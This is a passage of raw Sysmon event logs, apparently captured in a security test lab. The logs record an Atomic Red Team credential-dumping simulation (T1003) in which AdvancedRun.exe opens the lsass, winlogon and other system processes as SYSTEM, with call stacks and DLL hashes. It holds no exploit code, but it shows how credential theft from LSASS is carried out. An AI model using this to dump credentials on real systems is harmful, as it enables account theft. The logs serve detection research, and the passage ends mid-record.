17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951973Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951969Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951968Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003951967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003951965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.292{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003951953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003951952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 